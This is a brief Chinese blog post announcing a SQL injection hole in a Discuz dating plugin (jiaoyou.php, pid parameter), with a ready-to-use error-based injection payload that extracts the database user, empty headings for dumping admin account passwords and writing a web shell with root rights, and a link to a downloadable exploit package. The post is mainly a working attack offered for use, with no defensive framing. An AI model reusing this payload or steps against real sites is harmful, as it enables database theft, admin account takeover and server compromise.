Discuz交友插件漏洞附EXP

DZ交友插件漏洞jiaoyou.php?pid=1

有的注入需要登录,注入代码如下:

' or @' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @' and '1'='1

爆管理账号密码方法一:

爆管理账号密码方法二:

root权限写shell:

初学php,写了个简单的exp:http://i0day-wordpress.stor.sinaapp.com/uploads/2013/04/DiscuzSQL.zip




评论 (0)